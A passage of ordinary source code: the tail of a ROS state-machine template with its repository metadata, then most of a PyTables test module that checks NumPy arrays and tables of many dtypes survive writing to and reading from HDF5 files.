                setattr(userdata, output_key, msg)
        return 'succeeded'
{% do defined_headers.append('class_ReadTopicState') %}{% endif %}
{% endblock class_defs %}
| {
"content_hash": "82edde205aa0f7abad0d5d2decf62081",
"timestamp": "",
"source": "github",
"line_count": 135,
"max_line_length": 148,
"avg_line_length": 35.8962962962963,
"alnum_prop": 0.6246388774246802,
"repo_name": "ReconCell/smacha",
"id": "ab33d1124c91c1d8c6cca637161e169d203359e8",
"size": "4846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "smacha_ros/src/smacha_ros/templates/ReadTopicState.tpl.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1574"
},
{
"name": "CMake",
"bytes": "10500"
},
{
"name": "Makefile",
"bytes": "1336"
},
{
"name": "Python",
"bytes": "1277803"
},
{
"name": "Shell",
"bytes": "15158"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import os
import sys
import tempfile
import numpy as np
import tables
from tables import (
StringCol, BoolCol, FloatCol, ComplexCol, EnumCol,
Int8Col, UInt8Col, Int16Col, UInt16Col, Int32Col, UInt32Col,
Int64Col, Float32Col, Float64Col, Time64Col
)
from tables.tests import common
from tables.tests.common import allequal
from tables.tests.common import unittest
from tables.tests.common import PyTablesTestCase as TestCase
# Typecodes of the numerical dtypes exercised by the tests below.
typecodes = ['b', 'h', 'i', 'l', 'q', 'f', 'd']
# UInt64 checking disabled on win platforms
# because this type is not supported
if sys.platform != 'win32':
    typecodes += ['B', 'H', 'I', 'L', 'Q', 'F', 'D']
else:
    typecodes += ['B', 'H', 'I', 'L', 'F', 'D']
typecodes += ['b1']  # boolean

# Extended-precision typecodes are only tested when the installed PyTables
# build exposes the corresponding Atom classes.
if hasattr(tables, 'Float16Atom'):
    typecodes.append('e')
if hasattr(tables, 'Float96Atom') or hasattr(tables, 'Float128Atom'):
    typecodes.append('g')
# Bug fix: the second attribute name was misspelled 'Conplex256Atom', so the
# extended-complex typecode 'G' was never enabled on builds that only
# provide Complex256Atom.
if hasattr(tables, 'Complex192Atom') or hasattr(tables, 'Complex256Atom'):
    typecodes.append('G')

# '<' or '>' matching the host byte order, used to spell explicit dtypes.
byteorder = {'little': '<', 'big': '>'}[sys.byteorder]
class BasicTestCase(TestCase):
    """Basic test for all the supported typecodes present in NumPy.

    All of them are included on PyTables.  Subclasses provide the fixtures
    ``title``, ``tupleInt`` (a numpy array) and ``tupleChar`` (string data).
    """

    endiancheck = 0

    def WriteRead(self, testArray):
        """Round-trip *testArray* through a temporary HDF5 file.

        Writes the array, re-opens the file read-only, reads it back and
        asserts shape, dtype and contents are preserved.  The temporary
        file is always removed, even on failure.
        """
        if common.verbose:
            print('\n', '-=' * 30)
            print("Running test for array with typecode '%s'" %
                  testArray.dtype.char, end=' ')
            print("for class check:", self.title)

        # Create an instance of HDF5 Table
        self.h5fname = tempfile.mktemp(".h5")
        try:
            with tables.open_file(self.h5fname, mode="w") as self.h5file:
                self.root = self.h5file.root
                # Create the array under root and name 'somearray'
                a = testArray
                self.h5file.create_array(self.root, 'somearray', a,
                                         "Some array")

            # Re-open the file in read-only mode
            with tables.open_file(self.h5fname, mode="r") as self.h5file:
                self.root = self.h5file.root
                # Read the saved array
                b = self.root.somearray.read()

                # For cases that read returns a python type instead of a
                # numpy type
                if not hasattr(b, "shape"):
                    # Bug fix: this previously read 'np.np.array(...)',
                    # which raises AttributeError (numpy has no attribute
                    # 'np').
                    b = np.array(b, dtype=a.dtype.str)

                # Compare them. They should be equal.
                # if not allequal(a,b, "numpy") and common.verbose:
                if common.verbose:
                    print("Array written:", a)
                    print("Array written shape:", a.shape)
                    print("Array written itemsize:", a.itemsize)
                    print("Array written type:", a.dtype.char)
                    print("Array read:", b)
                    print("Array read shape:", b.shape)
                    print("Array read itemsize:", b.itemsize)
                    print("Array read type:", b.dtype.char)

                type_ = self.root.somearray.atom.type

                # Check strictly the array equality
                self.assertEqual(type(a), type(b))
                self.assertEqual(a.shape, b.shape)
                self.assertEqual(a.shape, self.root.somearray.shape)
                self.assertEqual(a.dtype, b.dtype)
                if a.dtype.char[0] == "S":
                    self.assertEqual(type_, "string")
                else:
                    self.assertEqual(a.dtype.base.name, type_)
                self.assertTrue(allequal(a, b, "numpy"))
        finally:
            # Then, delete the file
            if os.path.exists(self.h5fname):
                os.remove(self.h5fname)

    def test00_char(self):
        """Data integrity during recovery (character objects)"""
        a = np.array(self.tupleChar, 'S'+str(len(self.tupleChar)))
        self.WriteRead(a)

    def test01_char_nc(self):
        """Data integrity during recovery (non-contiguous character objects)"""
        a = np.array(self.tupleChar, 'S'+str(len(self.tupleChar)))
        if a.shape == ():
            b = a  # We cannot use the indexing notation
        else:
            b = a[::2]
            # Ensure that this numpy string is non-contiguous
            if a.shape[0] > 2:
                self.assertEqual(b.flags['CONTIGUOUS'], False)
        self.WriteRead(b)

    def test02_types(self):
        """Data integrity during recovery (numerical types)"""
        for typecode in typecodes:
            if self.tupleInt.shape:
                a = self.tupleInt.astype(typecode)
            else:
                # shape is the empty tuple ()
                a = np.array(self.tupleInt, dtype=typecode)
            self.WriteRead(a)

    def test03_types_nc(self):
        """Data integrity during recovery (non-contiguous numerical types)"""
        for typecode in typecodes:
            if self.tupleInt.shape:
                a = self.tupleInt.astype(typecode)
            else:
                # shape is the empty tuple ()
                a = np.array(self.tupleInt, dtype=typecode)
            # This should not be tested for the rank-0 case
            if len(a.shape) == 0:
                raise unittest.SkipTest
            b = a[::2]
            # Ensure that this array is non-contiguous (for non-trivial case)
            if a.shape[0] > 2:
                self.assertEqual(b.flags['CONTIGUOUS'], False)
            self.WriteRead(b)
class Basic0DOneTestCase(BasicTestCase):
    # Rank-0 case
    title = "Rank-0 case 1"
    tupleInt = np.array(3)  # 0-d (scalar) integer array
    tupleChar = "4"  # single-character string fixture
class Basic0DTwoTestCase(BasicTestCase):
    # Rank-0 case
    title = "Rank-0 case 2"
    tupleInt = np.array(33)  # 0-d (scalar) integer array
    tupleChar = "44"  # two-character string fixture
class Basic1DOneTestCase(BasicTestCase):
    # 1D case
    title = "Rank-1 case 1"
    tupleInt = np.array((3,))  # one-element 1-d array
    tupleChar = ("a",)
class Basic1DTwoTestCase(BasicTestCase):
    # 1D case
    title = "Rank-1 case 2"
    tupleInt = np.array((0, 4))  # two-element 1-d array
    tupleChar = ("aaa",)
class Basic1DThreeTestCase(BasicTestCase):
    # 1D case
    title = "Rank-1 case 3"
    tupleInt = np.array((3, 4, 5))  # three-element 1-d array
    tupleChar = ("aaaa", "bbb",)
class Basic2DTestCase(BasicTestCase):
    # 2D case
    title = "Rank-2 case 1"
    # tupleInt = reshape(np.array(np.arange((4)**2)), (4,)*2)
    tupleInt = np.ones((4,)*2)  # 4x4 array of ones
    tupleChar = [["aaa", "ddddd"], ["d", "ss"], ["s", "tt"]]
class Basic10DTestCase(BasicTestCase):
    # 10D case
    title = "Rank-10 case 1"
    # tupleInt = reshape(np.array(np.arange((2)**10)), (2,)*10)
    tupleInt = np.ones((2,)*10)  # rank-10 array with 2**10 elements
    # tupleChar = reshape(np.array([1],dtype="S1"),(1,)*10)
    # The next tuple consumes far more time, so this
    # test should be run in common.heavy mode.
    tupleChar = np.array(tupleInt, dtype="S1")
# class Basic32DTestCase(BasicTestCase):
# # 32D case (maximum)
# tupleInt = reshape(np.array((22,)), (1,)*32)
# # Strings seems to be very slow with somewhat large dimensions
# # This should not be run unless the numarray people address this problem
# # F. Alted 2006-01-04
# tupleChar = np.array(tupleInt, dtype="S1")
class GroupsArrayTestCase(common.TempFileMixin, TestCase):
    """This test class checks combinations of arrays with groups.

    It also uses array ranks which range up to 10.
    """

    def test00_iterativeGroups(self):
        """Checking combinations of arrays with groups

        It also uses array ranks which range up to 10.
        """
        if common.verbose:
            print('\n', '-=' * 30)
            print("Running %s.test00_iterativeGroups..." %
                  self.__class__.__name__)

        # Get the root group
        group = self.h5file.root

        # Write one array per typecode, each in a group one level deeper
        # than the previous and with rank equal to the iteration count.
        i = 1
        for typecode in typecodes:
            # Create an array of typecode, with incrementally bigger ranges
            a = np.ones((2,) * i, typecode)
            # Save it on the HDF5 file
            dsetname = 'array_' + typecode
            if common.verbose:
                print("Creating dataset:", group._g_join(dsetname))
            self.h5file.create_array(group, dsetname, a, "Large array")
            # Create a new group
            group = self.h5file.create_group(group, 'group' + str(i))
            # increment the range for next iteration
            i += 1

        self._reopen()

        # Get the root group
        group = self.h5file.root

        # Get the metadata on the previously saved arrays
        for i in range(1, len(typecodes)):
            # Create an array for later comparison
            a = np.ones((2,) * i, typecodes[i - 1])
            # Get the dset object hanging from group
            dset = getattr(group, 'array_' + typecodes[i-1])
            # Get the actual array
            b = dset.read()
            if not allequal(a, b, "numpy") and common.verbose:
                print("Array a original. Shape: ==>", a.shape)
                print("Array a original. Data: ==>", a)
                print("Info from dataset:", dset._v_pathname)
                print(" shape ==>", dset.shape, end=' ')
                print(" dtype ==> %s" % dset.dtype)
                print("Array b read from file. Shape: ==>", b.shape, end=' ')
                print(". Type ==> %s" % b.dtype.char)
            self.assertEqual(a.shape, b.shape)
            if np.dtype('l').itemsize == 4:
                if (a.dtype.char == "i" or a.dtype.char == "l"):
                    # Special exception. We have no way to distinguish between
                    # "l" and "i" typecode, and we can consider them the same
                    # to all practical effects
                    self.assertTrue(b.dtype.char == "l" or b.dtype.char == "i")
                elif (a.dtype.char == "I" or a.dtype.char == "L"):
                    # Special exception. We have no way to distinguish between
                    # "L" and "I" typecode, and we can consider them the same
                    # to all practical effects
                    self.assertTrue(b.dtype.char == "L" or b.dtype.char == "I")
                else:
                    self.assertTrue(allequal(a, b, "numpy"))
            elif np.dtype('l').itemsize == 8:
                if (a.dtype.char == "q" or a.dtype.char == "l"):
                    # Special exception. We have no way to distinguish between
                    # "q" and "l" typecode in 64-bit platforms, and we can
                    # consider them the same to all practical effects
                    self.assertTrue(b.dtype.char == "l" or b.dtype.char == "q")
                elif (a.dtype.char == "Q" or a.dtype.char == "L"):
                    # Special exception. We have no way to distinguish between
                    # "Q" and "L" typecode in 64-bit platforms, and we can
                    # consider them the same to all practical effects
                    self.assertTrue(b.dtype.char == "L" or b.dtype.char == "Q")
                else:
                    self.assertTrue(allequal(a, b, "numpy"))

            # Iterate over the next group
            group = getattr(group, 'group' + str(i))

    def test01_largeRankArrays(self):
        """Checking creation of large rank arrays (0 < rank <= 32)

        It also uses array ranks which range up to maxrank.
        """
        # maximum level of recursivity (deepest group level) achieved:
        # maxrank = 32 (for an effective maximum rank of 32)
        # This limit is due to a limit in the HDF5 library.
        minrank = 1
        maxrank = 32

        if common.verbose:
            print('\n', '-=' * 30)
            print("Running %s.test01_largeRankArrays..." %
                  self.__class__.__name__)
            print("Maximum rank for tested arrays:", maxrank)

        group = self.h5file.root
        if common.verbose:
            print("Rank array writing progress: ", end=' ')
        for rank in range(minrank, maxrank + 1):
            # Create an array of integers, with incrementally bigger ranges
            a = np.ones((1,) * rank, 'i')
            if common.verbose:
                print("%3d," % (rank), end=' ')
            self.h5file.create_array(group, "array", a, "Rank: %s" % rank)
            group = self.h5file.create_group(group, 'group' + str(rank))

        # Flush the buffers
        self.h5file.flush()

        self._reopen()

        group = self.h5file.root
        if common.verbose:
            print()
            print("Rank array reading progress: ")

        # Get the metadata on the previously saved arrays
        for rank in range(minrank, maxrank + 1):
            # Create an array for later comparison
            a = np.ones((1,) * rank, 'i')
            # Get the actual array
            b = group.array.read()
            if common.verbose:
                print("%3d," % (rank), end=' ')
            if not a.tolist() == b.tolist() and common.verbose:
                dset = group.array
                print("Info from dataset:", dset._v_pathname)
                print(" Shape: ==>", dset.shape, end=' ')
                print(" typecode ==> %c" % dset.typecode)
                print("Array b read from file. Shape: ==>", b.shape, end=' ')
                print(". Type ==> %c" % b.dtype.char)
            self.assertEqual(a.shape, b.shape)
            if a.dtype.char == "i":
                # Special exception. We have no way to distinguish between
                # "l" and "i" typecode, and we can consider them the same
                # to all practical effects
                self.assertTrue(b.dtype.char == "l" or b.dtype.char == "i")
            else:
                self.assertEqual(a.dtype.char, b.dtype.char)
            self.assertEqual(a, b)

            # Iterate over the next group
            group = self.h5file.get_node(group, 'group' + str(rank))

        if common.verbose:
            print()  # This flushes the stdout buffer
# Test Record class
class Record(tables.IsDescription):
    """Row description with one column per supported PyTables type."""
    var1 = StringCol(itemsize=4, dflt=b"abcd", pos=0)
    var2 = StringCol(itemsize=1, dflt=b"a", pos=1)
    var3 = BoolCol(dflt=1)
    var4 = Int8Col(dflt=1)
    var5 = UInt8Col(dflt=1)
    var6 = Int16Col(dflt=1)
    var7 = UInt16Col(dflt=1)
    var8 = Int32Col(dflt=1)
    var9 = UInt32Col(dflt=1)
    var10 = Int64Col(dflt=1)
    var11 = Float32Col(dflt=1.0)
    var12 = Float64Col(dflt=1.0)
    var13 = ComplexCol(itemsize=8, dflt=(1.+0.j))
    var14 = ComplexCol(itemsize=16, dflt=(1.+0.j))
    # Extended-precision columns are only declared when the installed
    # PyTables build provides the corresponding Col classes.
    if hasattr(tables, 'Float16Col'):
        var15 = tables.Float16Col(dflt=1.0)
    if hasattr(tables, 'Float96Col'):
        var16 = tables.Float96Col(dflt=1.0)
    if hasattr(tables, 'Float128Col'):
        var17 = tables.Float128Col(dflt=1.0)
    # Bug fix: this check was misspelled 'Complex196Col'.  The extended
    # complex column PyTables may provide is Complex192Col (matching the
    # Complex192Atom checked at module level), so var18 was never declared
    # even on builds that support it.
    if hasattr(tables, 'Complex192Col'):
        var18 = tables.ComplexCol(itemsize=24, dflt=(1.+0.j))
    if hasattr(tables, 'Complex256Col'):
        var19 = tables.ComplexCol(itemsize=32, dflt=(1.+0.j))
class TableReadTestCase(common.TempFileMixin, TestCase):
    # Checks that reading table columns honours the "numpy" flavor, i.e.
    # that column data comes back as NumPy objects with the expected
    # dtype and contents.
    nrows = 100

    def setUp(self):
        super(TableReadTestCase, self).setUp()

        # Create an instance of an HDF5 Table
        table = self.h5file.create_table(self.h5file.root, 'table', Record)
        for i in range(self.nrows):
            table.row.append()  # Fill 100 rows with default values
        self._reopen(mode='a')

    def test01_readTableChar(self):
        """Checking column conversion into NumPy in read().

        Char flavor
        """
        table = self.h5file.root.table
        table.flavor = "numpy"
        for colname in table.colnames:
            numcol = table.read(field=colname)
            typecol = table.coltypes[colname]
            itemsizecol = table.description._v_dtypes[colname].base.itemsize
            nctypecode = numcol.dtype.char
            if typecol == "string":
                if itemsizecol > 1:
                    orignumcol = np.array(['abcd']*self.nrows, dtype='S4')
                else:
                    orignumcol = np.array(['a']*self.nrows, dtype='S1')
                if common.verbose:
                    print("Typecode of NumPy column read:", nctypecode)
                    print("Should look like:", 'c')
                    print("Itemsize of column:", itemsizecol)
                    print("Shape of NumPy column read:", numcol.shape)
                    print("Should look like:", orignumcol.shape)
                    print("First 3 elements of read col:", numcol[:3])
                # Check that both NumPy objects are equal
                self.assertTrue(allequal(numcol, orignumcol, "numpy"))

    def test01_readTableNum(self):
        """Checking column conversion into NumPy in read().

        NumPy flavor
        """
        table = self.h5file.root.table
        table.flavor = "numpy"
        for colname in table.colnames:
            numcol = table.read(field=colname)
            typecol = table.coltypes[colname]
            # NOTE(review): np.typeNA was removed in modern NumPy releases;
            # this lookup only works with older NumPy versions.
            nctypecode = np.typeNA[numcol.dtype.char[0]]
            if typecol != "string":
                if common.verbose:
                    print("Typecode of NumPy column read:", nctypecode)
                    print("Should look like:", typecol)
                orignumcol = np.ones(shape=self.nrows, dtype=numcol.dtype.char)
                # Check that both NumPy objects are equal
                self.assertTrue(allequal(numcol, orignumcol, "numpy"))

    def test02_readCoordsChar(self):
        """Column conversion into NumPy in readCoords().

        Chars
        """
        table = self.h5file.root.table
        table.flavor = "numpy"
        coords = [1, 2, 3]
        self.nrows = len(coords)
        for colname in table.colnames:
            numcol = table.read_coordinates(coords, field=colname)
            typecol = table.coltypes[colname]
            itemsizecol = table.description._v_dtypes[colname].base.itemsize
            nctypecode = numcol.dtype.char
            if typecol == "string":
                if itemsizecol > 1:
                    orignumcol = np.array(['abcd']*self.nrows, dtype='S4')
                else:
                    orignumcol = np.array(['a']*self.nrows, dtype='S1')
                if common.verbose:
                    print("Typecode of NumPy column read:", nctypecode)
                    print("Should look like:", 'c')
                    print("Itemsize of column:", itemsizecol)
                    print("Shape of NumPy column read:", numcol.shape)
                    print("Should look like:", orignumcol.shape)
                    print("First 3 elements of read col:", numcol[:3])
                # Check that both NumPy objects are equal
                self.assertTrue(allequal(numcol, orignumcol, "numpy"))

    def test02_readCoordsNum(self):
        """Column conversion into NumPy in read_coordinates().

        NumPy.
        """
        table = self.h5file.root.table
        table.flavor = "numpy"
        coords = [1, 2, 3]
        self.nrows = len(coords)
        for colname in table.colnames:
            numcol = table.read_coordinates(coords, field=colname)
            typecol = table.coltypes[colname]
            type_ = numcol.dtype.type
            if typecol != "string":
                if typecol == "int64":
                    # NOTE(review): this 'return' ends the whole test at
                    # the first int64 column, skipping later columns.
                    return
                if common.verbose:
                    print("Type of read NumPy column:", type_)
                    print("Should look like:", typecol)
                orignumcol = np.ones(shape=self.nrows, dtype=numcol.dtype.char)
                # Check that both NumPy objects are equal
                self.assertTrue(allequal(numcol, orignumcol, "numpy"))

    def test03_getIndexNumPy(self):
        """Getting table rows specified as NumPy scalar integers."""
        table = self.h5file.root.table
        coords = np.array([1, 2, 3], dtype='int8')
        for colname in table.colnames:
            numcol = [table[coord][colname] for coord in coords]
            typecol = table.coltypes[colname]
            if typecol != "string":
                if typecol == "int64":
                    # NOTE(review): ends the whole test at the first int64
                    # column, skipping later columns.
                    return
                numcol = np.array(numcol, typecol)
                if common.verbose:
                    type_ = numcol.dtype.type
                    print("Type of read NumPy column:", type_)
                    print("Should look like:", typecol)
                orignumcol = np.ones(shape=len(numcol),
                                     dtype=numcol.dtype.char)
                # Check that both NumPy objects are equal
                self.assertTrue(allequal(numcol, orignumcol, "numpy"))

    def test04_setIndexNumPy(self):
        """Setting table rows specified as NumPy integers."""
        self._reopen(mode='a')
        table = self.h5file.root.table
        table.flavor = "numpy"
        coords = np.array([1, 2, 3], dtype='int8')
        # Modify row 1
        # From PyTables 2.0 on, assignments to records can be done
        # only as tuples (see http://projects.scipy.org/scipy/numpy/ticket/315)
        # table[coords[0]] = ["aasa","x"]+[232]*12
        n = len(Record.columns) - 2
        table[coords[0]] = tuple(["aasa", "x"]+[232]*n)  # XXX
        # record = list(table[coords[0]])
        record = table.read(coords[0], coords[0] + 1)
        if common.verbose:
            print("Original row:\n"
                  "['aasa', 'x', True, -24, 232, 232, 232, 232, 232L, "
                  "232, 232.0, 232.0, (232 + 0j), (232+0j), 232.0, "
                  "(232+0j)]\n")
            print("Read row:\n", record)
        self.assertEqual(record['var1'], b'aasa')
        self.assertEqual(record['var2'], b'x')
        self.assertEqual(record['var3'], True)
        self.assertEqual(record['var4'], -24)
        self.assertEqual(record['var7'], 232)
# The declaration of the nested table:
class Info(tables.IsDescription):
    # Nested-column declaration used by TestTDescr below.
    _v_pos = 3  # position of this nested column within the parent table
    Name = StringCol(itemsize=2)
    Value = ComplexCol(itemsize=16)
class TestTDescr(tables.IsDescription):
    """A description that has several nested columns."""
    x = Int32Col(dflt=0, shape=2, pos=0)  # 0
    y = FloatCol(dflt=1, shape=(2, 2))
    z = UInt8Col(dflt=1)
    z3 = EnumCol({'r': 4, 'g': 2, 'b': 1}, 'r', 'int32', shape=2)
    color = StringCol(itemsize=4, dflt=b"ab", pos=2)
    info = Info()  # uses the module-level Info declared above

    class Info(tables.IsDescription):  # 1
        # First level of nesting (shadows the module-level Info from here on).
        _v_pos = 1
        name = StringCol(itemsize=2)
        value = ComplexCol(itemsize=16, pos=0)  # 0
        y2 = FloatCol(pos=1)  # 1
        z2 = UInt8Col()

        class Info2(tables.IsDescription):
            # Second level of nesting.
            y3 = Time64Col(shape=2)
            name = StringCol(itemsize=2)
            value = ComplexCol(itemsize=16, shape=2)
class TableNativeFlavorTestCase(common.TempFileMixin, TestCase):
    # Verifies that a table with flavor="numpy" returns native NumPy
    # objects from its read/query/modify APIs.
    # NOTE(review): the test methods below read a 'close' attribute which
    # is not defined in this chunk — presumably supplied by subclasses;
    # confirm against the rest of the file.
    nrows = 100

    def setUp(self):
        super(TableNativeFlavorTestCase, self).setUp()

        # Create an instance of an HDF5 Table
        table = self.h5file.create_table(self.h5file.root, 'table', TestTDescr,
                                         expectedrows=self.nrows)
        table.flavor = "numpy"
        for i in range(self.nrows):
            table.row.append()  # Fill 100 rows with default values
        table.flush()
    def test01a_basicTableRead(self):
        """Checking the return of a NumPy in read()."""
        if self.close:
            self._reopen(mode='a')
        table = self.h5file.root.table
        data = table[:]
        if common.verbose:
            print("Type of read:", type(data))
            print("Description of the record:", data.dtype.descr)
            print("First 3 elements of read:", data[:3])
        # Check that both NumPy objects are equal
        self.assertTrue(isinstance(data, np.ndarray))
        # Check the value of some columns
        # A flat column
        col = table.cols.x[:3]
        self.assertTrue(isinstance(col, np.ndarray))
        npcol = np.zeros((3, 2), dtype="int32")
        self.assertTrue(allequal(col, npcol, "numpy"))
        # A nested column
        col = table.cols.Info[:3]
        self.assertTrue(isinstance(col, np.ndarray))
        # Expected dtype of the nested 'Info' column (native byte order).
        dtype = [('value', 'c16'),
                 ('y2', 'f8'),
                 ('Info2',
                  [('name', 'S2'),
                   ('value', 'c16', (2,)),
                   ('y3', 'f8', (2,))]),
                 ('name', 'S2'),
                 ('z2', 'u1')]
        npcol = np.zeros((3,), dtype=dtype)
        self.assertEqual(col.dtype.descr, npcol.dtype.descr)
        if common.verbose:
            print("col-->", col)
            print("npcol-->", npcol)
        # A copy() is needed in case the buffer can be in different segments
        self.assertEqual(bytes(col.copy().data), bytes(npcol.data))

    def test01b_basicTableRead(self):
        """Checking the return of a NumPy in read() (strided version)."""
        if self.close:
            self._reopen(mode='a')
        table = self.h5file.root.table
        data = table[::3]
        if common.verbose:
            print("Type of read:", type(data))
            print("Description of the record:", data.dtype.descr)
            print("First 3 elements of read:", data[:3])
        # Check that both NumPy objects are equal
        self.assertTrue(isinstance(data, np.ndarray))
        # Check the value of some columns
        # A flat column
        col = table.cols.x[:9:3]
        self.assertTrue(isinstance(col, np.ndarray))
        npcol = np.zeros((3, 2), dtype="int32")
        self.assertTrue(allequal(col, npcol, "numpy"))
        # A nested column
        col = table.cols.Info[:9:3]
        self.assertTrue(isinstance(col, np.ndarray))
        # Expected dtype spelled with an explicit byte-order prefix.
        dtype = [('value', '%sc16' % byteorder),
                 ('y2', '%sf8' % byteorder),
                 ('Info2',
                  [('name', '|S2'),
                   ('value', '%sc16' % byteorder, (2,)),
                   ('y3', '%sf8' % byteorder, (2,))]),
                 ('name', '|S2'),
                 ('z2', '|u1')]
        npcol = np.zeros((3,), dtype=dtype)
        self.assertEqual(col.dtype.descr, npcol.dtype.descr)
        if common.verbose:
            print("col-->", col)
            print("npcol-->", npcol)
        # A copy() is needed in case the buffer can be in different segments
        self.assertEqual(bytes(col.copy().data), bytes(npcol.data))
    def test02_getWhereList(self):
        """Checking the return of NumPy in get_where_list method."""
        if self.close:
            self._reopen(mode='a')
        table = self.h5file.root.table
        # All 100 default rows have z == 1, so every row index is returned.
        data = table.get_where_list('z == 1')
        if common.verbose:
            print("Type of read:", type(data))
            print("Description of the record:", data.dtype.descr)
            print("First 3 elements of read:", data[:3])
        # Check that both NumPy objects are equal
        self.assertTrue(isinstance(data, np.ndarray))
        # Check that all columns have been selected
        self.assertEqual(len(data), 100)
        # Finally, check that the contents are ok
        self.assertTrue(allequal(data, np.arange(100, dtype="i8"), "numpy"))

    def test03a_readWhere(self):
        """Checking the return of NumPy in read_where method (strings)."""
        table = self.h5file.root.table
        table.cols.color.create_index()
        if self.close:
            self._reopen(mode='a')
        table = self.h5file.root.table
        data = table.read_where('color == b"ab"')
        if common.verbose:
            print("Type of read:", type(data))
            print("Length of the data read:", len(data))
        # Check that both NumPy objects are equal
        self.assertTrue(isinstance(data, np.ndarray))
        # Check that all columns have been selected
        self.assertEqual(len(data), self.nrows)

    def test03b_readWhere(self):
        """Checking the return of NumPy in read_where method (numeric)."""
        table = self.h5file.root.table
        table.cols.z.create_index()
        if self.close:
            self._reopen(mode='a')
        table = self.h5file.root.table
        # No default row has z == 0, so the selection is empty.
        data = table.read_where('z == 0')
        if common.verbose:
            print("Type of read:", type(data))
            print("Length of the data read:", len(data))
        # Check that both NumPy objects are equal
        self.assertTrue(isinstance(data, np.ndarray))
        # Check that all columns have been selected
        self.assertEqual(len(data), 0)
    def test04a_createTable(self):
        """Checking the Table creation from a numpy recarray."""
        # Nested dtype spelled with an explicit byte-order prefix.
        dtype = [('value', '%sc16' % byteorder),
                 ('y2', '%sf8' % byteorder),
                 ('Info2',
                  [('name', '|S2'),
                   ('value', '%sc16' % byteorder, (2,)),
                   ('y3', '%sf8' % byteorder, (2,))]),
                 ('name', '|S2'),
                 ('z2', '|u1')]
        npdata = np.zeros((3,), dtype=dtype)
        table = self.h5file.create_table(self.h5file.root, 'table2', npdata)
        if self.close:
            self._reopen(mode='a')
        table = self.h5file.root.table2
        data = table[:]
        if common.verbose:
            print("Type of read:", type(data))
            print("Description of the record:", data.dtype.descr)
            print("First 3 elements of read:", data[:3])
            print("Length of the data read:", len(data))
        # Check that both NumPy objects are equal
        self.assertTrue(isinstance(data, np.ndarray))
        # Check the type
        self.assertEqual(data.dtype.descr, npdata.dtype.descr)
        if common.verbose:
            print("npdata-->", npdata)
            print("data-->", data)
        # A copy() is needed in case the buffer would be in different segments
        self.assertEqual(bytes(data.copy().data), bytes(npdata.data))

    def test04b_appendTable(self):
        """Checking appending a numpy recarray."""
        table = self.h5file.root.table
        npdata = table[3:6]
        table.append(npdata)
        if self.close:
            self._reopen(mode='a')
        table = self.h5file.root.table
        data = table[-3:]
        if common.verbose:
            print("Type of read:", type(data))
            print("Description of the record:", data.dtype.descr)
            print("Last 3 elements of read:", data[-3:])
            print("Length of the data read:", len(data))
        # Check that both NumPy objects are equal
        self.assertTrue(isinstance(data, np.ndarray))
        # Check the type
        self.assertEqual(data.dtype.descr, npdata.dtype.descr)
        if common.verbose:
            print("npdata-->", npdata)
            print("data-->", data)
        # A copy() is needed in case the buffer would be in different segments
        self.assertEqual(bytes(data.copy().data), bytes(npdata.data))
    def test05a_assignColumn(self):
        """Checking assigning to a column."""
        table = self.h5file.root.table
        table.cols.z[:] = np.zeros((100,), dtype='u1')
        if self.close:
            self._reopen(mode='a')
        table = self.h5file.root.table
        data = table.cols.z[:]
        if common.verbose:
            print("Type of read:", type(data))
            print("Description of the record:", data.dtype.descr)
            print("First 3 elements of read:", data[:3])
            print("Length of the data read:", len(data))
        # Check that both NumPy objects are equal
        self.assertTrue(isinstance(data, np.ndarray))
        # Check that all columns have been selected
        self.assertEqual(len(data), 100)
        # Finally, check that the contents are ok
        self.assertTrue(allequal(data, np.zeros((100,), dtype="u1"), "numpy"))

    def test05b_modifyingColumns(self):
        """Checking modifying several columns at once."""
        table = self.h5file.root.table
        xcol = np.ones((3, 2), 'int32')
        ycol = np.zeros((3, 2, 2), 'float64')
        zcol = np.zeros((3,), 'uint8')
        # Overwrite rows 3..5 of columns x, y and z in one call.
        table.modify_columns(3, 6, 1, [xcol, ycol, zcol], ['x', 'y', 'z'])
        if self.close:
            self._reopen(mode='a')
        table = self.h5file.root.table
        data = table.cols.y[3:6]
        if common.verbose:
            print("Type of read:", type(data))
            print("Description of the record:", data.dtype.descr)
            print("First 3 elements of read:", data[:3])
            print("Length of the data read:", len(data))
        # Check that both NumPy objects are equal
        self.assertTrue(isinstance(data, np.ndarray))
        # Check the type
        self.assertEqual(data.dtype.descr, ycol.dtype.descr)
        if common.verbose:
            print("ycol-->", ycol)
            print("data-->", data)
        # A copy() is needed in case the buffer would be in different segments
        self.assertEqual(data.copy().data, ycol.data)

    def test05c_modifyingColumns(self):
        """Checking modifying several columns using a single numpy buffer."""
        table = self.h5file.root.table
        dtype = [('x', 'i4', (2,)), ('y', 'f8', (2, 2)), ('z', 'u1')]
        nparray = np.zeros((3,), dtype=dtype)
        table.modify_columns(3, 6, 1, nparray, ['x', 'y', 'z'])
        if self.close:
            self._reopen(mode='a')
        table = self.h5file.root.table
        ycol = np.zeros((3, 2, 2), 'float64')
        data = table.cols.y[3:6]
        if common.verbose:
            print("Type of read:", type(data))
            print("Description of the record:", data.dtype.descr)
            print("First 3 elements of read:", data[:3])
            print("Length of the data read:", len(data))
        # Check that both NumPy objects are equal
        self.assertTrue(isinstance(data, np.ndarray))
        # Check the type
        self.assertEqual(data.dtype.descr, ycol.dtype.descr)
        if common.verbose:
            print("ycol-->", ycol)
            print("data-->", data)
        # A copy() is needed in case the buffer would be in different segments
        self.assertEqual(data.copy().data, ycol.data)
    def test06a_assignNestedColumn(self):
        """Checking assigning a nested column (using modify_column)."""
        table = self.h5file.root.table
        # Replacement data for the nested 'Info' column, rows 3..5.
        dtype = [('value', '%sc16' % byteorder),
                 ('y2', '%sf8' % byteorder),
                 ('Info2',
                  [('name', '|S2'),
                   ('value', '%sc16' % byteorder, (2,)),
                   ('y3', '%sf8' % byteorder, (2,))]),
                 ('name', '|S2'),
                 ('z2', '|u1')]
        npdata = np.zeros((3,), dtype=dtype)
        data = table.cols.Info[3:6]
        table.modify_column(3, 6, 1, column=npdata, colname='Info')
        if self.close:
            self._reopen(mode='a')
        table = self.h5file.root.table
        data = table.cols.Info[3:6]
        if common.verbose:
            print("Type of read:", type(data))
            print("Description of the record:", data.dtype.descr)
            print("First 3 elements of read:", data[:3])
            print("Length of the data read:", len(data))
        # Check that both NumPy objects are equal
        self.assertTrue(isinstance(data, np.ndarray))
        # Check the type
